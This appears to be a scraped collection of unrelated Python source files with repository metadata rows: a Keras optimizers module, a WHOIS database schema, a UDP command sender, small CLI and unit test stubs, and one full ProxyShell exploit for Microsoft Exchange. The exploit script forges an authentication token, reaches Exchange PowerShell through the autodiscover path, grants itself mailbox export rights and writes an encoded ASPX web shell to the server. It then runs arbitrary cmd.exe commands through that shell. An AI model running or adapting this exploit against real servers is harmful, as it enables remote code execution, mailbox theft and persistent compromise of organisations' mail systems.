    key, val = env_var.split('=', 1)
    Print('[%s] = [%s]' % (key, val))
    os.environ[key] = val
  stdin_data = ''
  if GlobalSettings['stdin']:
    # NOTE(review): this passes the open file object (not its contents) to
    # DoRun; test_lib presumably accepts either form -- confirm.
    stdin_data = open(GlobalSettings['stdin'])
  run_under = GlobalSettings['run_under']
  if run_under:
    command = run_under.split(',') + command
  Banner('running %s' % str(command))
  # print the command in copy-and-pastable fashion
  print ' '.join(env_vars + command)
  # Concatenate output when running multiple times (e.g., for timing).
  combined_stdout = ''
  combined_stderr = ''
  cur_runs = 0
  num_runs = GlobalSettings['num_runs']
  while cur_runs < num_runs:
    cur_runs += 1
    # Clear out previous log_file.
    if GlobalSettings['log_file']:
      try:
        os.unlink(GlobalSettings['log_file'])  # might not pre-exist
      except OSError:
        pass
    ret_code, stdout, stderr = DoRun(command, stdin_data)
    if ret_code != 0:
      return ret_code
    combined_stdout += stdout
    combined_stderr += stderr
  # Process the log output after all the runs.
  success = ProcessLogOutputCombined(combined_stdout, combined_stderr)
  if not success:
    # Bogus time, since only ProcessLogOutputCombined failed.
    Print(FailureMessage(0.0) + ' ProcessLogOutputCombined failed!')
    return 1
  return 0
if __name__ == '__main__':
  retval = Main(sys.argv[1:])
  # Add some whitespace to make the logs easier to read.
  sys.stdout.write('\n\n')
  sys.exit(retval)
| 35.487734 | 80 | 0.668524 |
338e2e07ba4bd3ae471d823f71896f1a121927ab | 402 | py | Python | ravengis/cli.py | Zeitsperre/RavenGIS | 730a82a8be0549fb5b954d7cbc0a2984fb2be86f | [
"MIT"
] | 2 | 2021-08-05T14:20:58.000Z | 2021-08-06T00:01:46.000Z | ravengis/cli.py | Zeitsperre/RavenGIS | 730a82a8be0549fb5b954d7cbc0a2984fb2be86f | [
"MIT"
] | null | null | null | ravengis/cli.py | Zeitsperre/RavenGIS | 730a82a8be0549fb5b954d7cbc0a2984fb2be86f | [
"MIT"
] | null | null | null | """Console script for ravengis."""
import sys
import click
@click.command()
def main(args=None):
    """Console script for ravengis.

    Placeholder entry point generated by the project template: prints
    instructions for where to put real CLI code and exits with status 0.
    """
    click.echo("Replace this message by putting your code into "
               "ravengis.cli.main")
    click.echo("See click documentation at https://click.palletsprojects.com/")
    return 0
if __name__ == "__main__":
    sys.exit(main())  # pragma: no cover
| 23.647059 | 79 | 0.664179 |
927433524f0d1e5ce2fbc85d5f398f774df8f448 | 2,161 | py | Python | PyFunceble/engine/database/schemas/whois_record.py | fossabot/PyFunceble | 4335cb31e6cf20cf8e10dd2cc6ac3afa50199ea4 | [
"Apache-2.0"
] | null | null | null | PyFunceble/engine/database/schemas/whois_record.py | fossabot/PyFunceble | 4335cb31e6cf20cf8e10dd2cc6ac3afa50199ea4 | [
"Apache-2.0"
] | null | null | null | PyFunceble/engine/database/schemas/whois_record.py | fossabot/PyFunceble | 4335cb31e6cf20cf8e10dd2cc6ac3afa50199ea4 | [
"Apache-2.0"
] | null | null | null | """
The tool to check the availability or syntax of domain, IP or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Provides the schema of our "whois_record" table.
Author:
Nissar Chababy, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/special-thanks.html
Contributors:
https://pyfunceble.github.io/contributors.html
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/master/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020 Nissar Chababy
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from sqlalchemy import Column, Integer, String, Text
from ..loader.base_class import DatabaseBase
class WhoisRecord(DatabaseBase):
    """
    Provides the schema of our whois_record table.
    """

    # Subject (e.g. a domain) the WHOIS record was fetched for; unique key.
    subject = Column(Text, nullable=False, unique=True)
    # Expiration date as extracted from the WHOIS record.
    expiration_date = Column(Text, nullable=False)
    # Expiration moment as an integer timestamp, for cheap comparisons.
    epoch = Column(Integer, nullable=False)
    # Short state string -- exact value set not visible here; confirm callers.
    state = Column(String(80), nullable=False)
    # Raw WHOIS response, when kept (optional).
    record = Column(Text, nullable=True)
    # WHOIS server that answered, when known (optional).
    server = Column(Text, nullable=True)
| 31.318841 | 88 | 0.552059 |
dfa6b37e338aeee385a9b1ec65640ad438620a7a | 11,268 | py | Python | proxyshell_mod.py | aravazhimdr/ProxyShell-POC-Mod | 03646720306b5dcd544c0a29388bda98020a07f0 | [
"MIT"
] | 6 | 2021-08-19T03:05:38.000Z | 2021-12-15T11:39:12.000Z | proxyshell_mod.py | aravazhimdr/ProxyShell-POC-Mod | 03646720306b5dcd544c0a29388bda98020a07f0 | [
"MIT"
] | null | null | null | proxyshell_mod.py | aravazhimdr/ProxyShell-POC-Mod | 03646720306b5dcd544c0a29388bda98020a07f0 | [
"MIT"
] | 2 | 2021-10-04T10:09:10.000Z | 2022-02-17T19:54:18.000Z | #!/usr/bin/env python3
import argparse
import base64
import struct
import random
import string
import requests
import threading
import sys
import time
import re
import xml.etree.ElementTree as ET
from pypsrp.wsman import WSMan
from pypsrp.powershell import PowerShell, RunspacePool
"""
ProxyShell POC - @aravazhimdr
This exploit code is a merge of two POC. They both had pros & cons; So I merged them.
Credits to @donnymaasland & @ber_m1ng
"""
class ProxyShell:
def __init__(self, exchange_url, email, verify=False):
self.email = email
self.exchange_url = exchange_url if exchange_url.startswith('https://') else f'https://{exchange_url}'
self.rand_email = f'{rand_string()}@{rand_string()}.{rand_string(3)}'
self.rand_email_split = f'@{self.rand_email.split("@")[1]}'
self.sid = None
self.legacydn = None
self.rand_subj = rand_string(16)
self.session = requests.Session()
self.session.verify = False
self.session.headers = {
'Cookie': f'Email=autodiscover/autodiscover.json?a={self.rand_email}'
}
def post(self, endpoint, data, headers={}):
proxyDict = {
"http" : "http://127.0.0.1:8080",
"https" : "http://127.0.0.1:8080",
"ftp" : "http://127.0.0.1:8080"
}
url = f'{self.exchange_url}/autodiscover/autodiscover.json?a={self.rand_email}{endpoint}'
r = self.session.post(
url=url,
data=data,
headers=headers
#proxies=proxyDict
)
return r
def get_token(self):
self.token = self.gen_token()
def get_sid(self):
data = self.legacydn
data += '\x00\x00\x00\x00\x00\xe4\x04'
data += '\x00\x00\x09\x04\x00\x00\x09'
data += '\x04\x00\x00\x00\x00\x00\x00'
headers = {
"X-Requesttype": 'Connect',
"X-Clientinfo": '{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}',
"X-Clientapplication": 'Outlook/15.0.4815.1002',
"X-Requestid": '{C715155F-2BE8-44E0-BD34-2960067874C8}:2',
'Content-Type': 'application/mapi-http'
}
r = self.post(
'/mapi/emsmdb',
data,
headers
)
self.sid = r.text.split("with SID ")[1].split(" and MasterAccountSid")[0]
def get_legacydn(self):
data = self.autodiscover_body()
headers = {'Content-Type': 'text/xml'}
r = self.post(
'/autodiscover/autodiscover.xml',
data,
headers
)
#print(r.content)
autodiscover_xml = ET.fromstring(r.content)
self.legacydn = autodiscover_xml.find(
'{*}Response/{*}User/{*}LegacyDN'
).text
def autodiscover_body(self):
autodiscover = ET.Element(
'Autodiscover',
xmlns='http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006'
)
request = ET.SubElement(autodiscover, 'Request')
ET.SubElement(request, 'EMailAddress').text = self.email
ET.SubElement(request, 'AcceptableResponseSchema').text = 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a'
return ET.tostring(
autodiscover,
encoding='unicode',
method='xml'
)
def gen_token(self):
# From: https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/
version = 0
ttype = 'Windows'
compressed = 0
auth_type = 'Kerberos'
raw_token = b''
gsid = 'S-1-5-32-544'
version_data = b'V' + (1).to_bytes(1, 'little') + (version).to_bytes(1, 'little')
type_data = b'T' + (len(ttype)).to_bytes(1, 'little') + ttype.encode()
compress_data = b'C' + (compressed).to_bytes(1, 'little')
auth_data = b'A' + (len(auth_type)).to_bytes(1, 'little') + auth_type.encode()
login_data = b'L' + (len(self.email)).to_bytes(1, 'little') + self.email.encode()
user_data = b'U' + (len(self.sid)).to_bytes(1, 'little') + self.sid.encode()
group_data = b'G' + struct.pack('<II', 1, 7) + (len(gsid)).to_bytes(1, 'little') + gsid.encode()
ext_data = b'E' + struct.pack('>I', 0)
raw_token += version_data
raw_token += type_data
raw_token += compress_data
raw_token += auth_data
raw_token += login_data
raw_token += user_data
raw_token += group_data
raw_token += ext_data
data = base64.b64encode(raw_token).decode()
return data
def rand_string(n=5):
return ''.join(random.choices(string.ascii_lowercase, k=n))
def exploit(proxyshell):
proxyshell.get_legacydn()
print(f'LegacyDN: {proxyshell.legacydn}')
proxyshell.get_sid()
print(f'SID: {proxyshell.sid}')
proxyshell.get_token()
print(f'Token: {proxyshell.token}')
def shell(command, port, proxyshell):
# From: https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/
if command.lower() in ['exit', 'quit']:
exit()
powershell_url = f'/Powershell?X-Rps-CAT={proxyshell.token}'
suffix = f'&Email=autodiscover/autodiscover.json%3F{proxyshell.rand_email_split}'
path = f'autodiscover/autodiscover.json?{proxyshell.rand_email_split}{powershell_url}{suffix}'
wsman = WSMan(proxyshell.exchange_url.replace("https://",""), path=path, ssl="true", port=443, cert_validation=False)
with RunspacePool(wsman, configuration_name='Microsoft.Exchange') as pool:
if command.lower().strip() == 'dropshell':
drop_shell(proxyshell)
#New-MailboxExportRequest might fail. Use New-ExchangeCertificate to get RCE
ps = PowerShell(pool)
ps.add_cmdlet('New-ManagementRoleAssignment').add_parameter('Role', 'Mailbox Import Export').add_parameter('User', proxyshell.email)
output = ps.invoke()
print("OUTPUT:\n%s" % "\n".join([str(s) for s in output]))
print("ERROR:\n%s" % "\n".join([str(s) for s in ps.streams.error]))
ps = PowerShell(pool)
ps.add_cmdlet(
'New-MailboxExportRequest'
).add_parameter(
'Mailbox', proxyshell.email
).add_parameter(
'FilePath', f'\\\\localhost\\c$\\inetpub\\wwwroot\\aspnet_client\\{proxyshell.rand_subj}.aspx'
).add_parameter(
'IncludeFolders', '#Drafts#'
).add_parameter(
'ContentFilter', f'Subject -eq \'{proxyshell.rand_subj}\''
)
output = ps.invoke()
print("OUTPUT:\n%s" % "\n".join([str(s) for s in output]))
print("ERROR:\n%s" % "\n".join([str(s) for s in ps.streams.error]))
shell_url = f'{proxyshell.exchange_url}/aspnet_client/{proxyshell.rand_subj}.aspx'
print(f'Shell URL: {shell_url}')
for i in range(10):
print(f'Testing shell {i}')
r = requests.get(shell_url, verify=proxyshell.session.verify)
if r.status_code == 200:
delimit = rand_string()
while True:
cmd = input('Shell> ')
if cmd.lower() in ['exit', 'quit']:
return
exec_code = f'Response.Write("{delimit}" + new ActiveXObject("WScript.Shell").Exec("cmd.exe /c {cmd}").StdOut.ReadAll() + "{delimit}");'
r = requests.get(
shell_url,
params={
'exec_code':exec_code
},
verify=proxyshell.session.verify
)
output = r.content.split(delimit.encode())[1]
print(output.decode())
time.sleep(5)
i += 1
print('Shell drop failed :(')
return
else:
ps = PowerShell(pool)
ps.add_script(command)
output = ps.invoke()
print("OUTPUT:\n%s" % "\n".join([str(s) for s in output]))
print("ERROR:\n%s" % "\n".join([str(s) for s in ps.streams.error]))
def get_args():
parser = argparse.ArgumentParser(description='ProxyShell example')
parser.add_argument('-u', help='Exchange URL', required=True)
parser.add_argument('-e', help='Email address', required=True)
parser.add_argument('-p', help='Local wsman port', default=8000, type=int)
return parser.parse_args()
def drop_shell(proxyshell):
data = f"""
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
<t:SerializedSecurityContext>
<t:UserSid>{proxyshell.sid}</t:UserSid>
<t:GroupSids>
<t:GroupIdentifier>
<t:SecurityIdentifier>S-1-5-21</t:SecurityIdentifier>
</t:GroupIdentifier>
</t:GroupSids>
</t:SerializedSecurityContext>
</soap:Header>
<soap:Body>
<m:CreateItem MessageDisposition="SaveOnly">
<m:Items>
<t:Message>
<t:Subject>{proxyshell.rand_subj}</t:Subject>
<t:Body BodyType="HTML">hello from darkness side</t:Body>
<t:Attachments>
<t:FileAttachment>
<t:Name>FileAttachment.txt</t:Name>
<t:IsInline>false</t:IsInline>
<t:IsContactPhoto>false</t:IsContactPhoto>
<t:Content>ldZUhrdpFDnNqQbf96nf2v+CYWdUhrdpFII5hvcGqRT/gtbahqXahoLZnl33BlQUt9MGObmp39opINOpDYzJ6Z45OTk52qWpzYy+2lz32tYUfoLaddpUKVTTDdqCD2uC9wbWqV3agskxvtrWadMG1trzRAYNMZ45OTk5IZ6V+9ZUhrdpFNk=</t:Content>
</t:FileAttachment>
</t:Attachments>
<t:ToRecipients>
<t:Mailbox>
<t:EmailAddress>{proxyshell.email}</t:EmailAddress>
</t:Mailbox>
</t:ToRecipients>
</t:Message>
</m:Items>
</m:CreateItem>
</soap:Body>
</soap:Envelope>
"""
headers = {
'Content-Type': 'text/xml',
'X-Anchormailbox': proxyshell.email
}
r = proxyshell.post(
f'/EWS/exchange.asmx/?X-Rps-CAT={proxyshell.token}',
data=data,
headers=headers
)
def main():
args = get_args()
exchange_url = args.u
email = args.e
local_port = args.p
proxyshell = ProxyShell(
exchange_url,
email
)
exploit(proxyshell)
while True:
shell(input('PS> '), local_port, proxyshell)
if __name__ == '__main__':
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
if not (sys.version_info.major == 3 and sys.version_info.minor >= 8):
print("This script requires Python 3.8 or higher!")
print("You are using Python {}.{}.".format(sys.version_info.major, sys.version_info.minor))
sys.exit(1)
main()
| 33.238938 | 217 | 0.582357 |
0e9c115319243033cc0bd738bc9b06fe980f1204 | 936 | py | Python | test/test_inline_response2004.py | metacore-io/metacore-api-client-python | 37d6127442e7a56deeedb88bf50b83e5d24fa7b0 | [
"MIT"
] | null | null | null | test/test_inline_response2004.py | metacore-io/metacore-api-client-python | 37d6127442e7a56deeedb88bf50b83e5d24fa7b0 | [
"MIT"
] | null | null | null | test/test_inline_response2004.py | metacore-io/metacore-api-client-python | 37d6127442e7a56deeedb88bf50b83e5d24fa7b0 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Metacore IoT Object Storage API
Metacore Object Storage - IOT Core Services # noqa: E501
OpenAPI spec version: 1.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import metacore_api_python_cli
from models.inline_response2004 import InlineResponse2004 # noqa: E501
from metacore_api_python_cli.rest import ApiException
class TestInlineResponse2004(unittest.TestCase):
    """InlineResponse2004 unit test stubs (generated by swagger-codegen)."""

    def setUp(self):
        # No fixtures needed for the generated stub.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testInlineResponse2004(self):
        """Test InlineResponse2004"""
        # FIXME: construct object with mandatory attributes with example values
        # model = metacore_api_python_cli.models.inline_response2004.InlineResponse2004()  # noqa: E501
        pass


if __name__ == '__main__':
    unittest.main()
| 23.4 | 103 | 0.720085 |
c1209c65c498ab62c54677e916c6769384eb87de | 858 | py | Python | tests/unit/test_add_to_set.py | bobgautier/rjgtoys-cli | 9bfc689c230047b86c8fc9af9f7f446d18d54993 | [
"MIT"
] | null | null | null | tests/unit/test_add_to_set.py | bobgautier/rjgtoys-cli | 9bfc689c230047b86c8fc9af9f7f446d18d54993 | [
"MIT"
] | null | null | null | tests/unit/test_add_to_set.py | bobgautier/rjgtoys-cli | 9bfc689c230047b86c8fc9af9f7f446d18d54993 | [
"MIT"
] | null | null | null |
from argparse import ArgumentParser
from rjgtoys.cli._base import add_to_set, splitlist
def test_simple():
    """--item with a scalar int type accumulates distinct values into a set."""
    p = ArgumentParser()
    p.add_argument('--item', help="Item to add",
                   action=add_to_set, type=int)
    args = p.parse_args("--item 1 --item 2 --item 1".split(" "))
    # Duplicates collapse: three occurrences yield a two-element set.
    assert args.item == set((1, 2))
def split(v):
    """Parse a comma-separated string of integers into a list of ints."""
    pieces = v.split(',')
    return [int(piece) for piece in pieces]
def test_multi():
    """A type callable may return a list; each element is added to the set."""
    p = ArgumentParser()
    p.add_argument('--item', help="Item(s) to add",
                   action=add_to_set, type=split)
    args = p.parse_args("--item 1,2 --item 1".split(" "))
    assert args.item == set((1, 2))
def test_multi_split():
    """splitlist(int) should behave like the hand-written split() helper."""
    p = ArgumentParser()
    p.add_argument('--item', help="Item(s) to add",
                   action=add_to_set, type=splitlist(int))
    args = p.parse_args("--item 1,2 --item 1".split(" "))
    assert args.item == set((1, 2))
| 22.578947 | 64 | 0.617716 |
fe0be31f78075e8910206012b7f39aec1e36c35f | 514 | py | Python | command_module/command_module.py | albertaloop/T_SWE_2019_2020 | 9095b6b64b5ca03c62bef9347945919bf3b79ed4 | [
"MIT"
] | null | null | null | command_module/command_module.py | albertaloop/T_SWE_2019_2020 | 9095b6b64b5ca03c62bef9347945919bf3b79ed4 | [
"MIT"
] | 22 | 2022-01-11T05:27:30.000Z | 2022-03-29T02:34:13.000Z | command_module/command_module.py | albertaloop/T_SWE_2019_2020 | 9095b6b64b5ca03c62bef9347945919bf3b79ed4 | [
"MIT"
] | null | null | null | import socket
import struct
from enum import IntEnum
class Command(IntEnum):
    """Command codes; each is serialized as a single unsigned byte
    (see CommandManager, which packs them with struct format ">B")."""
    Start = 0
    Stop = 1
class CommandManager:
    """Sends single-byte command packets to a server over UDP.

    Each command is encoded as one big-endian unsigned byte and sent as
    its own datagram; no reply is read.
    """

    def __init__(self, ip_address, port):
        """Create a manager targeting (ip_address, port)."""
        self.server = (ip_address, port)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    def _send(self, command):
        """Pack `command` as one unsigned byte and send it as a datagram."""
        packet = struct.pack(">B", command)
        self.sock.sendto(packet, self.server)

    def start(self):
        """Send the Start command."""
        self._send(Command.Start)

    def stop(self):
        """Send the Stop command."""
        self._send(Command.Stop)
b704b885cb967997a7a8735b31f08a1537cf4a1c | 30,221 | py | Python | tensorflow/python/keras/optimizers.py | datanonymous/TFandroid | 89927e863b1ad96184ab09188f62b7e391c896d9 | [
"Apache-2.0"
] | 3 | 2019-02-04T10:10:19.000Z | 2019-12-29T08:09:37.000Z | tensorflow/python/keras/optimizers.py | datanonymous/TFandroid | 89927e863b1ad96184ab09188f62b7e391c896d9 | [
"Apache-2.0"
] | 1 | 2019-07-27T16:45:02.000Z | 2019-07-27T16:45:02.000Z | tensorflow/python/keras/optimizers.py | datanonymous/TFandroid | 89927e863b1ad96184ab09188f62b7e391c896d9 | [
"Apache-2.0"
] | 6 | 2018-11-29T20:52:00.000Z | 2021-02-19T22:43:32.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Built-in optimizer classes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from six.moves import zip # pylint: disable=redefined-builtin
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.framework import ops
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.optimizer_v2 import adadelta as adadelta_v2
from tensorflow.python.keras.optimizer_v2 import adagrad as adagrad_v2
from tensorflow.python.keras.optimizer_v2 import adam as adam_v2
from tensorflow.python.keras.optimizer_v2 import adamax as adamax_v2
from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_v2
from tensorflow.python.keras.optimizer_v2 import nadam as nadam_v2
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.keras.optimizer_v2 import rmsprop as rmsprop_v2
from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.training import optimizer as tf_optimizer_module
from tensorflow.python.training import training_util
from tensorflow.python.training.checkpointable import base as checkpointable
from tensorflow.python.util.tf_export import keras_export
class Optimizer(object):
  """Abstract optimizer base class.
  Note: this is the parent class of all optimizers, not an actual optimizer
  that can be used for training models.
  All Keras optimizers support the following keyword arguments:
      clipnorm: float >= 0. Gradients will be clipped
          when their L2 norm exceeds this value.
      clipvalue: float >= 0. Gradients will be clipped
          when their absolute value exceeds this value.
  """
  def __init__(self, **kwargs):
    # Only gradient-clipping kwargs are accepted here; anything else is a
    # programming error in the caller.
    allowed_kwargs = {'clipnorm', 'clipvalue'}
    for k in kwargs:
      if k not in allowed_kwargs:
        raise TypeError('Unexpected keyword argument '
                        'passed to optimizer: ' + str(k))
      # checks that clipnorm >= 0 and clipvalue >= 0
      if kwargs[k] < 0:
        raise ValueError('Expected {} >= 0, received: {}'.format(k, kwargs[k]))
    # Clipping settings become plain attributes; their presence is later
    # detected with hasattr() in get_gradients()/get_config().
    self.__dict__.update(kwargs)
    self.updates = []
    self.weights = []
  def get_updates(self, loss, params):
    # Subclasses must return the list of ops that apply one update step.
    raise NotImplementedError
  def get_gradients(self, loss, params):
    """Returns gradients of `loss` with respect to `params`.
    Arguments:
        loss: Loss tensor.
        params: List of variables.
    Returns:
        List of gradient tensors.
    Raises:
        ValueError: In case any gradient cannot be computed (e.g. if gradient
          function not implemented).
    """
    grads = K.gradients(loss, params)
    if None in grads:
      raise ValueError('An operation has `None` for gradient. '
                       'Please make sure that all of your ops have a '
                       'gradient defined (i.e. are differentiable). '
                       'Common ops without gradient: '
                       'K.argmax, K.round, K.eval.')
    # Apply optional norm/value clipping set via the constructor kwargs.
    if hasattr(self, 'clipnorm'):
      grads = [clip_ops.clip_by_norm(g, self.clipnorm) for g in grads]
    if hasattr(self, 'clipvalue'):
      grads = [
          clip_ops.clip_by_value(g, -self.clipvalue, self.clipvalue)
          for g in grads
      ]
    return grads
  def set_weights(self, weights):
    """Sets the weights of the optimizer, from Numpy arrays.
    Should only be called after computing the gradients
    (otherwise the optimizer has no weights).
    Arguments:
        weights: a list of Numpy arrays. The number
            of arrays and their shape must match
            number of the dimensions of the weights
            of the optimizer (i.e. it should match the
            output of `get_weights`).
    Raises:
        ValueError: in case of incompatible weight shapes.
    """
    params = self.weights
    if len(params) != len(weights):
      raise ValueError(
          'Length of the specified weight list (' + str(len(weights)) +
          ') does not match the number of weights '
          'of the optimizer (' + str(len(params)) + ')')
    weight_value_tuples = []
    param_values = K.batch_get_value(params)
    for pv, p, w in zip(param_values, params, weights):
      if pv.shape != w.shape:
        raise ValueError(
            'Optimizer weight shape ' + str(pv.shape) + ' not compatible with '
            'provided weight shape ' + str(w.shape))
      weight_value_tuples.append((p, w))
    K.batch_set_value(weight_value_tuples)
  def get_weights(self):
    """Returns the current value of the weights of the optimizer.
    Returns:
        A list of numpy arrays.
    """
    return K.batch_get_value(self.weights)
  def get_config(self):
    """Returns the optimizer's configuration as a JSON-serializable dict."""
    config = {}
    if hasattr(self, 'clipnorm'):
      config['clipnorm'] = self.clipnorm
    if hasattr(self, 'clipvalue'):
      config['clipvalue'] = self.clipvalue
    return config
  @classmethod
  def from_config(cls, config):
    """Creates an optimizer from its config (inverse of `get_config`)."""
    return cls(**config)
class SGD(Optimizer):
  """Stochastic gradient descent optimizer.
  Includes support for momentum,
  learning rate decay, and Nesterov momentum.
  Arguments:
      lr: float >= 0. Learning rate.
      momentum: float >= 0. Parameter that accelerates SGD
          in the relevant direction and dampens oscillations.
      decay: float >= 0. Learning rate decay over each update.
      nesterov: boolean. Whether to apply Nesterov momentum.
  """
  def __init__(self, lr=0.01, momentum=0., decay=0., nesterov=False, **kwargs):
    super(SGD, self).__init__(**kwargs)
    with K.name_scope(self.__class__.__name__):
      self.iterations = K.variable(0, dtype='int64', name='iterations')
      self.lr = K.variable(lr, name='lr')
      self.momentum = K.variable(momentum, name='momentum')
      self.decay = K.variable(decay, name='decay')
    self.initial_decay = decay
    self.nesterov = nesterov
  def get_updates(self, loss, params):
    """Builds and returns the list of ops that apply one SGD step."""
    grads = self.get_gradients(loss, params)
    self.updates = [state_ops.assign_add(self.iterations, 1)]
    lr = self.lr
    # Time-based decay: lr / (1 + decay * iterations).
    if self.initial_decay > 0:
      lr = lr * ( # pylint: disable=g-no-augmented-assignment
          1. / (1. + self.decay * math_ops.cast(self.iterations,
                                                K.dtype(self.decay))))
    # momentum
    shapes = [K.int_shape(p) for p in params]
    moments = [K.zeros(shape) for shape in shapes]
    self.weights = [self.iterations] + moments
    for p, g, m in zip(params, grads, moments):
      v = self.momentum * m - lr * g # velocity
      self.updates.append(state_ops.assign(m, v))
      if self.nesterov:
        new_p = p + self.momentum * v - lr * g
      else:
        new_p = p + v
      # Apply constraints.
      if getattr(p, 'constraint', None) is not None:
        new_p = p.constraint(new_p)
      self.updates.append(state_ops.assign(p, new_p))
    return self.updates
  def get_config(self):
    """Returns the optimizer configuration as a serializable dict."""
    config = {
        'lr': float(K.get_value(self.lr)),
        'momentum': float(K.get_value(self.momentum)),
        'decay': float(K.get_value(self.decay)),
        'nesterov': self.nesterov
    }
    base_config = super(SGD, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))
class RMSprop(Optimizer):
  """RMSProp optimizer.
  It is recommended to leave the parameters of this optimizer
  at their default values
  (except the learning rate, which can be freely tuned).
  This optimizer is usually a good choice for recurrent
  neural networks.
  Arguments:
      lr: float >= 0. Learning rate.
      rho: float >= 0.
      epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
      decay: float >= 0. Learning rate decay over each update.
  """
  def __init__(self, lr=0.001, rho=0.9, epsilon=None, decay=0., **kwargs):
    super(RMSprop, self).__init__(**kwargs)
    with K.name_scope(self.__class__.__name__):
      self.lr = K.variable(lr, name='lr')
      self.rho = K.variable(rho, name='rho')
      self.decay = K.variable(decay, name='decay')
      self.iterations = K.variable(0, dtype='int64', name='iterations')
    if epsilon is None:
      epsilon = K.epsilon()
    self.epsilon = epsilon
    self.initial_decay = decay
  def get_updates(self, loss, params):
    """Builds and returns the list of ops that apply one RMSProp step."""
    grads = self.get_gradients(loss, params)
    # One moving average of squared gradients per parameter.
    accumulators = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
    self.weights = accumulators
    self.updates = [state_ops.assign_add(self.iterations, 1)]
    lr = self.lr
    if self.initial_decay > 0:
      lr = lr * ( # pylint: disable=g-no-augmented-assignment
          1. / (1. + self.decay * math_ops.cast(self.iterations,
                                                K.dtype(self.decay))))
    for p, g, a in zip(params, grads, accumulators):
      # update accumulator
      new_a = self.rho * a + (1. - self.rho) * math_ops.square(g)
      self.updates.append(state_ops.assign(a, new_a))
      new_p = p - lr * g / (K.sqrt(new_a) + self.epsilon)
      # Apply constraints.
      if getattr(p, 'constraint', None) is not None:
        new_p = p.constraint(new_p)
      self.updates.append(state_ops.assign(p, new_p))
    return self.updates
  def get_config(self):
    """Returns the optimizer configuration as a serializable dict."""
    config = {
        'lr': float(K.get_value(self.lr)),
        'rho': float(K.get_value(self.rho)),
        'decay': float(K.get_value(self.decay)),
        'epsilon': self.epsilon
    }
    base_config = super(RMSprop, self).get_config()
    return dict(list(base_config.items()) + list(config.items()))
class Adagrad(Optimizer):
  """Adagrad optimizer.
  Adagrad is an optimizer with parameter-specific learning rates,
  which are adapted relative to how frequently a parameter gets
  updated during training. The more updates a parameter receives,
  the smaller the updates.
  It is recommended to leave the parameters of this optimizer
  at their default values.
  # Arguments
      lr: float >= 0. Initial learning rate.
      epsilon: float >= 0. If `None`, defaults to `K.epsilon()`.
      decay: float >= 0. Learning rate decay over each update.
  # References
      - [Adaptive Subgradient Methods for Online Learning and Stochastic Optimization](http://www.jmlr.org/papers/volume12/duchi11a/duchi11a.pdf)
  """
  def __init__(self, lr=0.01, epsilon=None, decay=0., **kwargs):
    super(Adagrad, self).__init__(**kwargs)
    with K.name_scope(self.__class__.__name__):
      self.lr = K.variable(lr, name='lr')
      self.decay = K.variable(decay, name='decay')
      self.iterations = K.variable(0, dtype='int64', name='iterations')
    if epsilon is None:
      epsilon = K.epsilon()
    self.epsilon = epsilon
    self.initial_decay = decay
  def get_updates(self, loss, params):
    """Builds and returns the list of ops that apply one Adagrad step."""
    grads = self.get_gradients(loss, params)
